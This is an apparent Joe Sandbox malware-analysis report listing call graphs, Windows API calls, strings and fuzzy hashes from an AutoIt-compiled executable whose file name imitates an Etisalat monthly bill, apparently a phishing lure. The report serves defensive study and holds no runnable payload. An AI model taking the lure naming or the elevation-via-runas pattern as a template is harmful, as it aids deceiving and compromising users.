102018->102049 102050 b6d060 89 API calls 102018->102050 102051 b6cedd 341 API calls 102018->102051 102055 b68bb2 68 API calls 102018->102055 102056 b69e9c 60 API calls Mailbox 102018->102056 102057 bb6d03 60 API calls 102018->102057 102052 bdad0f 341 API calls 102019->102052 102020->102018 102023 ba2cdf 102023->102023 102024->102009 102025->102011 102053 bdb1b7 341 API calls 3 library calls 102025->102053 102058 bdaa66 89 API calls 102029->102058 102030 b6d5a3 102030->102009 102033->102018 102046 b68bb2 68 API calls 102035->102046 102041->102018 102042->102018 102044->102018 102045->102018 102046->102030 102047->102018 102048->102018 102049->102018 102050->102018 102051->102018 102052->102024 102053->102011 102054->102018 102055->102018 102056->102018 102057->102018 102058->102011 102059->102023 102060 15e2410 102074 15e0000 102060->102074 102062 15e24d1 102077 15e2300 102062->102077 102080 15e3500 GetPEB 102074->102080 102076 15e068b 102076->102062 102078 15e2309 Sleep 102077->102078 102079 15e2317 102078->102079 102081 15e352a 102080->102081 102081->102076 102082 b9ff06 102083 b9ff10 102082->102083 102116 b6ac90 Mailbox _memmove 102082->102116 102181 b68e34 59 API calls Mailbox 102083->102181 102089 b6b5d5 102092 b681a7 59 API calls 102089->102092 102090 b80ff6 59 API calls Mailbox 102109 b6a097 Mailbox 102090->102109 102103 b6a1b7 102092->102103 102093 ba047f 102185 bca0b5 89 API calls 4 library calls 102093->102185 102094 b6b5da 102191 bca0b5 89 API calls 4 library calls 102094->102191 102096 b681a7 59 API calls 102096->102109 102097 b67f41 59 API calls 102097->102116 102099 b677c7 59 API calls 102099->102109 102101 ba048e 102102 b82f80 67 API calls __cinit 102102->102109 102105 bb7405 59 API calls 102105->102109 102106 bb66f4 Mailbox 59 API calls 102106->102103 102107 ba0e00 102190 bca0b5 89 API calls 4 library calls 102107->102190 102109->102089 102109->102090 102109->102093 102109->102094 102109->102096 102109->102099 102109->102102 102109->102103 102109->102105 102109->102107 102111 b6a6ba 102109->102111 102175 b6ca20 341 API calls 2 library calls 102109->102175 102176 b6ba60 60 API calls Mailbox 102109->102176 102110 bdbf80 341 API calls 102110->102116 102189 bca0b5 89 API calls 4 library calls 102111->102189 102112 bb66f4 Mailbox 59 API calls 102112->102116 102113 b6b416 102180 b6f803 341 API calls 102113->102180 102115 b6a000 341 API calls 102115->102116 102116->102097 102116->102103 102116->102109 102116->102110 102116->102112 102116->102113 102116->102115 102117 ba0c94 102116->102117 102119 ba0ca2 102116->102119 102122 b6b37c 102116->102122 102123 b80ff6 59 API calls Mailbox 102116->102123 102128 b6b685 102116->102128 102131 b6ade2 Mailbox 102116->102131 102137 bdc5f4 102116->102137 102169 bc7be0 102116->102169 102182 bb7405 59 API calls 102116->102182 102183 bdc4a7 85 API calls 2 library calls 102116->102183 102187 b69df0 59 API calls Mailbox 102117->102187 102188 bca0b5 89 API calls 4 library calls 102119->102188 102121 ba0c86 102121->102103 102121->102106 102178 b69e9c 60 API calls Mailbox 102122->102178 102123->102116 102125 b6b38d 102179 b69e9c 60 API calls Mailbox 102125->102179 102186 bca0b5 89 API calls 4 library calls 102128->102186 102131->102103 102131->102121 102131->102128 102132 ba00e0 VariantClear 102131->102132 102133 bd474d 341 API calls 102131->102133 102134 b72123 95 API calls 102131->102134 102135 bcd2e6 101 API calls 102131->102135 102136 bde237 130 API calls 102131->102136 102177 b69df0 59 API calls Mailbox 102131->102177 102184 bb7405 59 API calls 102131->102184 102132->102131 102133->102131 102134->102131 102135->102131 102136->102131 102138 b677c7 59 API calls 102137->102138 102139 bdc608 102138->102139 102140 b677c7 59 API calls 102139->102140 102141 bdc610 102140->102141 102142 b677c7 59 API calls 102141->102142 102143 bdc618 102142->102143 102144 b69997 84 API calls 102143->102144 102168 bdc626 102144->102168 102145 b67d2c 59 API calls 102145->102168 102146 bdc80f 102147 bdc83c Mailbox 102146->102147 102193 b69b9c 59 API calls Mailbox 102146->102193 102147->102116 102148 bdc7f6 102151 b67e0b 59 API calls 102148->102151 102150 bdc811 102154 b67e0b 59 API calls 102150->102154 102152 bdc803 102151->102152 102156 b67c8e 59 API calls 102152->102156 102153 b67a84 59 API calls 102153->102168 102157 bdc820 102154->102157 102155 b681a7 59 API calls 102155->102168 102156->102146 102159 b67c8e 59 API calls 102157->102159 102158 b67faf 59 API calls 102161 bdc6bd CharUpperBuffW 102158->102161 102159->102146 102160 b67faf 59 API calls 102162 bdc77d CharUpperBuffW 102160->102162 102192 b6859a 68 API calls 102161->102192 102164 b6c707 69 API calls 102162->102164 102164->102168 102165 b69997 84 API calls 102165->102168 102166 b67e0b 59 API calls 102166->102168 102167 b67c8e 59 API calls 102167->102168 102168->102145 102168->102146 102168->102147 102168->102148 102168->102150 102168->102153 102168->102155 102168->102158 102168->102160 102168->102165 102168->102166 102168->102167 102170 bc7bec 102169->102170 102171 b80ff6 Mailbox 59 API calls 102170->102171 102172 bc7bfa 102171->102172 102173 bc7c08 102172->102173 102174 b677c7 59 API calls 102172->102174 102173->102116 102174->102173 102175->102109 102176->102109 102177->102131 102178->102125 102179->102113 102180->102128 102181->102116 102182->102116 102183->102116 102184->102131 102185->102101 102186->102121 102187->102121 102188->102121 102189->102103 102190->102094 102191->102103 102192->102168 102193->102147

                                      Executed Functions

                                      Function 00B63B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B63B7A
                                      • IsDebuggerPresent.KERNEL32 ref: 00B63B8C
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C262F8,00C262E0,?,?), ref: 00B63BFD
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                        • Part of subcall function 00B70A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B63C26,00C262F8,?,?,?), ref: 00B70ACE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00B63C81
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C193F0,00000010), ref: 00B9D4BC
                                      • SetCurrentDirectoryW.KERNEL32(?,00C262F8,?,?,?), ref: 00B9D4F4
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C15D40,00C262F8,?,?,?), ref: 00B9D57A
                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B9D581
                                        • Part of subcall function 00B63A58: GetSysColorBrush.USER32(0000000F), ref: 00B63A62
                                        • Part of subcall function 00B63A58: LoadCursorW.USER32(00000000,00007F00), ref: 00B63A71
                                        • Part of subcall function 00B63A58: LoadIconW.USER32(00000063), ref: 00B63A88
                                        • Part of subcall function 00B63A58: LoadIconW.USER32(000000A4), ref: 00B63A9A
                                        • Part of subcall function 00B63A58: LoadIconW.USER32(000000A2), ref: 00B63AAC
                                        • Part of subcall function 00B63A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B63AD2
                                        • Part of subcall function 00B63A58: RegisterClassExW.USER32(?), ref: 00B63B28
                                        • Part of subcall function 00B639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B63A15
                                        • Part of subcall function 00B639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63A36
                                        • Part of subcall function 00B639E7: ShowWindow.USER32(00000000,?,?), ref: 00B63A4A
                                        • Part of subcall function 00B639E7: ShowWindow.USER32(00000000,?,?), ref: 00B63A53
                                        • Part of subcall function 00B643DB: _memset.LIBCMT ref: 00B64401
                                        • Part of subcall function 00B643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B644A6
                                      Strings
                                      • runas, xrefs: 00B9D575
                                      • This is a third-party compiled AutoIt script., xrefs: 00B9D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                      • API String ID: 529118366-3287110873
                                      • Opcode ID: 7257fdccccb4901f8c59cc379709b69ce4da077f2693238e0d6d61b9f1090739
                                      • Instruction ID: ef88a44e6540df9d52c8b7798dba40dc8ccbcecd6995b172d2e3234cf7b05d57
                                      • Opcode Fuzzy Hash: 7257fdccccb4901f8c59cc379709b69ce4da077f2693238e0d6d61b9f1090739
                                      • Instruction Fuzzy Hash: 8751D270908289EACF21EBB4EC55FFD7BF8EB44704B0041F5F451A62A1DE785A46DB21
                                      Function 00B64AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 996 b64afe-b64b5e call b677c7 GetVersionExW call b67d2c 1001 b64b64 996->1001 1002 b64c69-b64c6b 996->1002 1004 b64b67-b64b6c 1001->1004 1003 b9db90-b9db9c 1002->1003 1005 b9db9d-b9dba1 1003->1005 1006 b64b72 1004->1006 1007 b64c70-b64c71 1004->1007 1009 b9dba3 1005->1009 1010 b9dba4-b9dbb0 1005->1010 1008 b64b73-b64baa call b67e8c call b67886 1006->1008 1007->1008 1018 b9dc8d-b9dc90 1008->1018 1019 b64bb0-b64bb1 1008->1019 1009->1010 1010->1005 1012 b9dbb2-b9dbb7 1010->1012 1012->1004 1014 b9dbbd-b9dbc4 1012->1014 1014->1003 1016 b9dbc6 1014->1016 1020 b9dbcb-b9dbce 1016->1020 1021 b9dca9-b9dcad 1018->1021 1022 b9dc92 1018->1022 1019->1020 1023 b64bb7-b64bc2 1019->1023 1024 b64bf1-b64c08 GetCurrentProcess IsWow64Process 1020->1024 1025 b9dbd4-b9dbf2 1020->1025 1030 b9dc98-b9dca1 1021->1030 1031 b9dcaf-b9dcb8 1021->1031 1026 b9dc95 1022->1026 1027 b9dc13-b9dc19 1023->1027 1028 b64bc8-b64bca 1023->1028 1032 b64c0d-b64c1e 1024->1032 1033 b64c0a 1024->1033 1025->1024 1029 b9dbf8-b9dbfe 1025->1029 1026->1030 1038 b9dc1b-b9dc1e 1027->1038 1039 b9dc23-b9dc29 1027->1039 1034 b64bd0-b64bd3 1028->1034 1035 b9dc2e-b9dc3a 1028->1035 1036 b9dc08-b9dc0e 1029->1036 1037 b9dc00-b9dc03 1029->1037 1030->1021 1031->1026 1040 b9dcba-b9dcbd 1031->1040 1041 b64c20-b64c30 call b64c95 1032->1041 1042 b64c89-b64c93 GetSystemInfo 1032->1042 1033->1032 1043 b9dc5a-b9dc5d 1034->1043 1044 b64bd9-b64be8 1034->1044 1046 b9dc3c-b9dc3f 1035->1046 1047 b9dc44-b9dc4a 1035->1047 1036->1024 1037->1024 1038->1024 1039->1024 1040->1030 1053 b64c32-b64c3f call b64c95 1041->1053 1054 b64c7d-b64c87 GetSystemInfo 1041->1054 1045 b64c56-b64c66 1042->1045 1043->1024 1052 b9dc63-b9dc78 1043->1052 1049 b9dc4f-b9dc55 1044->1049 1050 b64bee 1044->1050 1046->1024 1047->1024 1049->1024 1050->1024 1055 b9dc7a-b9dc7d 1052->1055 1056 b9dc82-b9dc88 1052->1056 1061 b64c76-b64c7b 1053->1061 1062 b64c41-b64c45 GetNativeSystemInfo 1053->1062 1057 b64c47-b64c4b 1054->1057 1055->1024 1056->1024 1057->1045 1059 b64c4d-b64c50 FreeLibrary 1057->1059 1059->1045 1061->1062 1062->1057
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00B64B2B
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • GetCurrentProcess.KERNEL32(?,00BEFAEC,00000000,00000000,?), ref: 00B64BF8
                                      • IsWow64Process.KERNEL32(00000000), ref: 00B64BFF
                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B64C45
                                      • FreeLibrary.KERNEL32(00000000), ref: 00B64C50
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00B64C81
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00B64C8D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                      • String ID:
                                      • API String ID: 1986165174-0
                                      • Opcode ID: 9d14a5d73023ae6ee0d7cd91afcabded28be8a9bea58dc21d8f18b7cf867f7f6
                                      • Instruction ID: 9d22855bc08e5f10649f4841d4be6765e77d49e2bab5b5dc1767d56204ef279d
                                      • Opcode Fuzzy Hash: 9d14a5d73023ae6ee0d7cd91afcabded28be8a9bea58dc21d8f18b7cf867f7f6
                                      • Instruction Fuzzy Hash: 3A91C57154ABC4DECB31CB6885916AABFF4EF26300B484EEDD0CA97B01D724E948C719
                                      Function 00B64FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1063 b64fe9-b65001 CreateStreamOnHGlobal 1064 b65003-b6501a FindResourceExW 1063->1064 1065 b65021-b65026 1063->1065 1066 b9dd5c-b9dd6b LoadResource 1064->1066 1067 b65020 1064->1067 1066->1067 1068 b9dd71-b9dd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 b9dd85-b9dd90 LockResource 1068->1069 1069->1067 1070 b9dd96-b9ddb4 1069->1070 1070->1067
                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B64EEE,?,?,00000000,00000000), ref: 00B64FF9
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B64EEE,?,?,00000000,00000000), ref: 00B65010
                                      • LoadResource.KERNEL32(?,00000000,?,?,00B64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B64F8F), ref: 00B9DD60
                                      • SizeofResource.KERNEL32(?,00000000,?,?,00B64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B64F8F), ref: 00B9DD75
                                      • LockResource.KERNEL32(00B64EEE,?,?,00B64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00B64F8F,00000000), ref: 00B9DD88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: 933ebea202fafbacbc378fc0139c8b41d61d379d4da8b1b25fcdb4a8807bb2de
                                      • Instruction ID: 81d92c2c33043bc7d5222c3f45740a2645946228a785290df4af0562da8c6767
                                      • Opcode Fuzzy Hash: 933ebea202fafbacbc378fc0139c8b41d61d379d4da8b1b25fcdb4a8807bb2de
                                      • Instruction Fuzzy Hash: 6D115A75200746AFDB318B65DC98F677BB9FBC9B11F2081A8F5068A260DB61EC008660
                                      Function 00BC4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00B9E7C1), ref: 00BC46A6
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00BC46B7
                                      • FindClose.KERNEL32(00000000), ref: 00BC46C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: c6eb025fbe59c636cd73a99f9f4b71f6bfd95bbe575cb79064c60427021b0db6
                                      • Instruction ID: 33a581225fd8d5321a3dcb566c61839a06da2353cbc4595c8b90aeab8301561e
                                      • Opcode Fuzzy Hash: c6eb025fbe59c636cd73a99f9f4b71f6bfd95bbe575cb79064c60427021b0db6
                                      • Instruction Fuzzy Hash: ECE0D8318105015B42106738EC9D8FA779CDE06335F1007A9F936C20E0EBB09E509599
                                      Function 00B6E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                      Download Yara Rule
                                      Strings
                                      • Variable must be of type 'Object'., xrefs: 00BA428C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Variable must be of type 'Object'.
                                      • API String ID: 0-109567571
                                      • Opcode ID: 414df24baf1de3a30abb67ab2e15052d2a57bbccc18fa2f8938912c5c6527057
                                      • Instruction ID: 27f6398653c0155bf003eba07af18503a88000f41602e109264d2b7dcd1238bd
                                      • Opcode Fuzzy Hash: 414df24baf1de3a30abb67ab2e15052d2a57bbccc18fa2f8938912c5c6527057
                                      • Instruction Fuzzy Hash: 67A24B78A04205CFCB24CF58D4D0AAAB7F1FF59304F2481A9E926AB351D779ED42CB91
                                      Function 00B70B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B70BBB
                                      • timeGetTime.WINMM ref: 00B70E76
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B70FB3
                                      • TranslateMessage.USER32(?), ref: 00B70FC7
                                      • DispatchMessageW.USER32(?), ref: 00B70FD5
                                      • Sleep.KERNEL32(0000000A), ref: 00B70FDF
                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00B7105A
                                      • DestroyWindow.USER32 ref: 00B71066
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B71080
                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00BA52AD
                                      • TranslateMessage.USER32(?), ref: 00BA608A
                                      • DispatchMessageW.USER32(?), ref: 00BA6098
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BA60AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                      • API String ID: 4003667617-3242690629
                                      • Opcode ID: fe009cb491159c69ef751713c5536171955471ceec7fc10aeb6c460e730e5ab6
                                      • Instruction ID: b493770f81cfdf250a4f95016dbd7f310f11204553803dc733e6f521a55bc826
                                      • Opcode Fuzzy Hash: fe009cb491159c69ef751713c5536171955471ceec7fc10aeb6c460e730e5ab6
                                      • Instruction Fuzzy Hash: FDB2CE70608741DFD734DF24C884BAAB7E4FF85304F14899EE49A972A1CB74E985CB92
                                      Function 00BC93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00BC91E9: __time64.LIBCMT ref: 00BC91F3
                                        • Part of subcall function 00B65045: _fseek.LIBCMT ref: 00B6505D
                                      • __wsplitpath.LIBCMT ref: 00BC94BE
                                        • Part of subcall function 00B8432E: __wsplitpath_helper.LIBCMT ref: 00B8436E
                                      • _wcscpy.LIBCMT ref: 00BC94D1
                                      • _wcscat.LIBCMT ref: 00BC94E4
                                      • __wsplitpath.LIBCMT ref: 00BC9509
                                      • _wcscat.LIBCMT ref: 00BC951F
                                      • _wcscat.LIBCMT ref: 00BC9532
                                        • Part of subcall function 00BC922F: _memmove.LIBCMT ref: 00BC9268
                                        • Part of subcall function 00BC922F: _memmove.LIBCMT ref: 00BC9277
                                      • _wcscmp.LIBCMT ref: 00BC9479
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AAE
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AC1
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BC96DC
                                      • _wcsncpy.LIBCMT ref: 00BC974F
                                      • DeleteFileW.KERNEL32(?,?), ref: 00BC9785
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BC979B
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BC97AC
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BC97BE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 1500180987-0
                                      • Opcode ID: 596eded978d0c27772571fb95c1ced0fab2da0e2f35313aa7cc6aad33e825fa2
                                      • Instruction ID: 3bc422be91ee5cd50c347475d079e69b2ae004dbd3cd9148837e25a625e6b5c7
                                      • Opcode Fuzzy Hash: 596eded978d0c27772571fb95c1ced0fab2da0e2f35313aa7cc6aad33e825fa2
                                      • Instruction Fuzzy Hash: 55C118B1D00229AADF21DFA4CC85EDEB7BDEF45300F0040EAF609E6251DB749A848F65
                                      Function 00B63015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00B63074
                                      • RegisterClassExW.USER32(00000030), ref: 00B6309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B630AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00B630CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B630DC
                                      • LoadIconW.USER32(000000A9), ref: 00B630F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B63101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 595c001da610243cfd8cc88a57219db1fa586467325a1f29ceb7ff9f2b05bc2a
                                      • Instruction ID: c82d34bfe5b76a3784a2ea8af515898fd5afa52e26cef805d4cf7a00dc76f119
                                      • Opcode Fuzzy Hash: 595c001da610243cfd8cc88a57219db1fa586467325a1f29ceb7ff9f2b05bc2a
                                      • Instruction Fuzzy Hash: 643136B191038AEFDB10DFA4E888B9DBBF0FB08310F10452EE580EA2A0D7B94581CF51
                                      Function 00B63041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00B63074
                                      • RegisterClassExW.USER32(00000030), ref: 00B6309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B630AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00B630CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B630DC
                                      • LoadIconW.USER32(000000A9), ref: 00B630F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B63101
                                      Strings
                                      Memory Dump Source
